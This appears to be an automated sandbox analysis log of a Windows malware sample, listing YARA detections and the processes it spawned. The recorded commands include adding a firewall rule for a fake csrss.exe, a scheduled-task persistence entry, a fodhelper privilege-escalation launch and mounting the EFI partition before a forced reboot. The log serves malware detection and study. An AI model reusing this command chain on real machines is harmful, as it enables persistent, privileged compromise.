            Source: 0.2.4t4y4r89UZ.exe.55e4f30.9.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
            Source: 34.2.csrss.exe.9ad2e0.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
            Source: 42.2.csrss.exe.5caa8d0.9.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
            Source: 0.3.4t4y4r89UZ.exe.5e99a80.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
            Source: 14.2.csrss.exe.9a56e0.3.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
            Source: 23.2.csrss.exe.5ca4f30.9.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
            Source: 10.3.4t4y4r89UZ.exe.5e29a80.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
            Source: 14.2.csrss.exe.5caa8d0.9.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
            Source: 23.3.csrss.exe.6559a80.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
            Source: 42.2.csrss.exe.9ab080.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
            Source: 10.3.4t4y4r89UZ.exe.5e240e0.3.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
            Source: 34.2.csrss.exe.5ca4f30.9.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
            Source: 10.2.4t4y4r89UZ.exe.5574f30.11.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
            Source: 16.3.csrss.exe.655bce0.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
            Source: 23.3.csrss.exe.655bce0.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
            Source: 14.2.csrss.exe.9ad2e0.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
            Source: 34.3.csrss.exe.6559a80.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
            Source: 14.2.csrss.exe.9ab080.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
            Source: 50.2.csrss.exe.9ad2e0.3.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
            Source: 10.2.4t4y4r89UZ.exe.9a56e0.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
            Source: 42.2.csrss.exe.5ca4f30.10.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
            Source: 34.2.csrss.exe.9a56e0.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
            Source: 50.3.csrss.exe.65540e0.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
            Source: 10.2.4t4y4r89UZ.exe.557a8d0.10.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
            Source: 16.2.csrss.exe.9ad2e0.3.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
            Source: 42.3.csrss.exe.65540e0.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
            Source: 42.2.csrss.exe.9ad2e0.0.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
            Source: 16.2.csrss.exe.9a56e0.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
            Source: 34.2.csrss.exe.5caa8d0.10.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
            Source: 42.2.csrss.exe.9a56e0.3.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
            Source: 0.3.4t4y4r89UZ.exe.5e9bce0.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
            Source: 50.2.csrss.exe.5caa8d0.10.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
            Source: 0.3.4t4y4r89UZ.exe.5e940e0.3.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
            Source: 16.3.csrss.exe.6559a80.3.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
            Source: 50.2.csrss.exe.9a56e0.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
            Source: 16.2.csrss.exe.5ca4f30.10.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
            Source: 14.3.csrss.exe.6559a80.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
            Source: 0.2.4t4y4r89UZ.exe.55ea8d0.10.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
            Source: 23.2.csrss.exe.9a56e0.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
            Source: 42.3.csrss.exe.6559a80.3.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
            Source: 14.2.csrss.exe.5ca4f30.10.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
            Source: 50.3.csrss.exe.6559a80.3.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
            Source: 23.2.csrss.exe.5caa8d0.11.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
            Source: 34.3.csrss.exe.65540e0.3.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
            Source: 50.2.csrss.exe.9ab080.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
            Source: 23.2.csrss.exe.9ad2e0.3.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
            Source: 16.2.csrss.exe.5caa8d0.11.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
            Source: 14.3.csrss.exe.65540e0.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
            Source: 34.3.csrss.exe.655bce0.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
            Source: 0.2.4t4y4r89UZ.exe.9ab080.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
            Source: 10.2.4t4y4r89UZ.exe.9ab080.3.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
            Source: 50.3.csrss.exe.655bce0.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
            Source: C:\Users\user\Desktop\4t4y4r89UZ.exeFile created: C:\Windows\rssJump to behavior
            Source: C:\Windows\rss\csrss.exeCode function: String function: 0042C330 appears 36 times
            Source: EfiGuardDxe.efi.14.drStatic PE information: No import functions for PE file found
            Source: bootmgfw.efi.14.drStatic PE information: No import functions for PE file found
            Source: bootx64.efi.14.drStatic PE information: No import functions for PE file found
            Source: 4t4y4r89UZ.exeBinary or memory string: OriginalFilename vs 4t4y4r89UZ.exe
            Source: 4t4y4r89UZ.exe, 00000000.00000002.292634106.0000000000C55000.00000040.00020000.sdmpBinary or memory string: OriginalFilenameDBGHELP.DLLj% vs 4t4y4r89UZ.exe
            Source: 4t4y4r89UZ.exe, 00000000.00000002.292634106.0000000000C55000.00000040.00020000.sdmpBinary or memory string: OriginalFilenamesymsrv.dllj% vs 4t4y4r89UZ.exe
            Source: 4t4y4r89UZ.exe, 00000000.00000002.292383315.0000000000A59000.00000040.00020000.sdmpBinary or memory string: OriginalFilenameHamakaze.exe( vs 4t4y4r89UZ.exe
            Source: 4t4y4r89UZ.exe, 00000000.00000003.284369390.0000000005CCA000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameWinmonFS.sysZ vs 4t4y4r89UZ.exe
            Source: 4t4y4r89UZ.exe, 00000000.00000003.284369390.0000000005CCA000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamedsefix.exe. vs 4t4y4r89UZ.exe
            Source: 4t4y4r89UZ.exeBinary or memory string: OriginalFilename vs 4t4y4r89UZ.exe
            Source: 4t4y4r89UZ.exe, 0000000A.00000002.325532501.0000000005629000.00000040.00000001.sdmpBinary or memory string: OriginalFilenameHamakaze.exe( vs 4t4y4r89UZ.exe
            Source: 4t4y4r89UZ.exe, 0000000A.00000003.300061428.00000000060D3000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameDBGHELP.DLLj% vs 4t4y4r89UZ.exe
            Source: 4t4y4r89UZ.exe, 0000000A.00000003.300061428.00000000060D3000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamesymsrv.dllj% vs 4t4y4r89UZ.exe
            Source: 4t4y4r89UZ.exe, 0000000A.00000003.299643807.0000000005C5A000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameWinmonFS.sysZ vs 4t4y4r89UZ.exe
            Source: 4t4y4r89UZ.exe, 0000000A.00000003.299643807.0000000005C5A000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamedsefix.exe. vs 4t4y4r89UZ.exe
            Source: C:\Windows\System32\svchost.exeSection loaded: xboxlivetitleid.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: cdpsgshims.dllJump to behavior
            Source: 4t4y4r89UZ.exeStatic PE information: invalid certificate
            Source: 4t4y4r89UZ.exeVirustotal: Detection: 33%
            Source: C:\Users\user\Desktop\4t4y4r89UZ.exeFile read: C:\Users\user\Desktop\4t4y4r89UZ.exeJump to behavior
            Source: 4t4y4r89UZ.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\4t4y4r89UZ.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\4t4y4r89UZ.exe "C:\Users\user\Desktop\4t4y4r89UZ.exe"
            Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
            Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
            Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
            Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
            Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
            Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k unistacksvcgroup
            Source: unknownProcess created: C:\Windows\System32\SgrmBroker.exe C:\Windows\system32\SgrmBroker.exe
            Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
            Source: unknownProcess created: C:\Windows\servicing\TrustedInstaller.exe C:\Windows\servicing\TrustedInstaller.exe
            Source: C:\Users\user\Desktop\4t4y4r89UZ.exeProcess created: C:\Users\user\Desktop\4t4y4r89UZ.exe C:\Users\user\Desktop\4t4y4r89UZ.exe
            Source: C:\Users\user\Desktop\4t4y4r89UZ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
            Source: C:\Users\user\Desktop\4t4y4r89UZ.exeProcess created: C:\Windows\rss\csrss.exe C:\Windows\rss\csrss.exe /305-305
            Source: unknownProcess created: C:\Windows\rss\csrss.exe "C:\Windows\rss\csrss.exe"
            Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
            Source: C:\Windows\rss\csrss.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
            Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\rss\csrss.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /delete /tn ScheduledUpdate /f
            Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: unknownProcess created: C:\Windows\rss\csrss.exe C:\Windows\rss\csrss.exe
            Source: C:\Windows\rss\csrss.exeProcess created: C:\Windows\SysWOW64\mountvol.exe mountvol B: /s
            Source: C:\Windows\SysWOW64\mountvol.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\rss\csrss.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\Sysnative\cmd.exe /C fodhelper
            Source: C:\Windows\rss\csrss.exeProcess created: C:\Windows\SysWOW64\mountvol.exe mountvol B: /d
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\fodhelper.exe fodhelper
            Source: C:\Windows\SysWOW64\mountvol.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\fodhelper.exe "C:\Windows\system32\fodhelper.exe"
            Source: C:\Windows\rss\csrss.exeProcess created: C:\Windows\SysWOW64\mountvol.exe mountvol B: /s
            Source: unknownProcess created: C:\Windows\rss\csrss.exe "C:\Windows\rss\csrss.exe"
            Source: C:\Windows\SysWOW64\mountvol.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\rss\csrss.exeProcess created: C:\Windows\SysWOW64\mountvol.exe mountvol B: /d
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\fodhelper.exe "C:\Windows\system32\fodhelper.exe"
            Source: C:\Windows\SysWOW64\mountvol.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\fodhelper.exeProcess created: C:\Windows\rss\csrss.exe "C:\Windows\rss\csrss.exe"
            Source: C:\Windows\rss\csrss.exeProcess created: C:\Windows\SysWOW64\shutdown.exe shutdown -r -t 5
            Source: C:\Windows\SysWOW64\shutdown.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\rss\csrss.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\Sysnative\cmd.exe /C fodhelper
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\fodhelper.exe fodhelper
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\fodhelper.exe "C:\Windows\system32\fodhelper.exe"
            Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\rss\csrss.exe C:\Windows\rss\csrss.exe
            Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
            Source: C:\Windows\System32\svchost.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\4t4y4r89UZ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"Jump to behavior
            Source: C:\Users\user\Desktop\4t4y4r89UZ.exeProcess created: C:\Windows\rss\csrss.exe C:\Windows\rss\csrss.exe /305-305Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yesJump to behavior
            Source: C:\Windows\rss\csrss.exeProcess created: C:\Windows\SysWOW64\mountvol.exe mountvol B: /sJump to behavior
            Source: C:\Windows\rss\csrss.exeProcess created: C:\Windows\SysWOW64\mountvol.exe mountvol B: /dJump to behavior
